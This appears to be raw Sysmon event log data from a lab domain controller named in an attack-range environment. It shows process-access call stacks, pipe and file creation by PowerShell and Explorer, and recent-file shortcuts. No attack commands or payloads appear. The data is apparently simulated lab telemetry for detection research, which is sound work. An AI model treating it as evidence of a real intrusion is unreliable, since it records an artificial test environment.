08:10:26.957{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x80000000000000001055565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:10:26.887{466BC892-F8F2-60EB-107E-00000000CF01}10188\PSHost.132705510262988449.10188.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001055564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.871{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_0vtx2ay0.bug.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.871{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_v25znm0x.54b.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.824{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_v25znm0x.54b.ps12021-07-12 08:10:26.824 10341000x80000000000000001055561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.739{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+5
1781 10341000x80000000000000001055557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf79f181.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.641{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.570{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.570{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.519{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.501{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.501{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.470{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.455{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.420{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.420{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.419{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.419{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001055536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.386{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001055535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.386{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.354{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 10341000x80000000000000001055533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.354{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.354{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 